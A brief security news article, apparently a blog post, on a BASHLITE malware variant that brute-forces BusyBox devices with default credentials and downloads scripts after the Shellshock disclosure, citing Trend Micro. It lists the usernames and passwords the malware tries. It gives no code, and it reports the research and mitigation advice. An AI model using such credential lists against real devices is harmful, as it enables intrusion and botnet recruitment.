A new variant of BASHLITE malware targeting devices running on BusyBox was spotted by security researcher at Trend Micro shortly after the public disclosure of the Shellshock vulnerability.
The malware detected as ELF_BASHLITE.A (ELF_FLODDER.W) when executed on victim's machine it scans the network for devices/machines running on BusyBox,and attempts to access them using a predefined list of usernames and passwords.The list of usernames includes,,'root','admin' and 'support' and list of passwords include,'root','admin','12345','pass','password','support' and '123456' and so on.Once connection is established,it runs the command to download and run bin.sh and bin2.sh scripts to gain control over the Busybox system.Therefore,this new version of Bashlite is designed not only to identify systems running BusyBox, but to also hijack them.
"Remote attackers can possibly maximize their control on affected devices by deploying other components or malicious software into the system depending on their motive,"said threat response engineer Rhena Inocencio (Trend Micro) "As such, a remote attacker can issue commands or download other files on the devices thus compromising its security."Trend Micro advised users to change the default usernames and passwords and disable remote shell if possible to these devices.
Bashlite malware includes the payload of the Shellshock exploit code and threat actors have used this critical ShellShock bash command vulnerability (CVE-2014-6271) that have been used to build botnets from hijacked devices,used to launch Distributed Denial of Service (DDoS) attack.
The ShellShock vulnerability was disclosed on September 24 and by September 30 security firms estimated that attacks using the exploit could top 1 billion, and more than 1000 organizations patched the ShellShock bug as fixes became available.
Post a Comment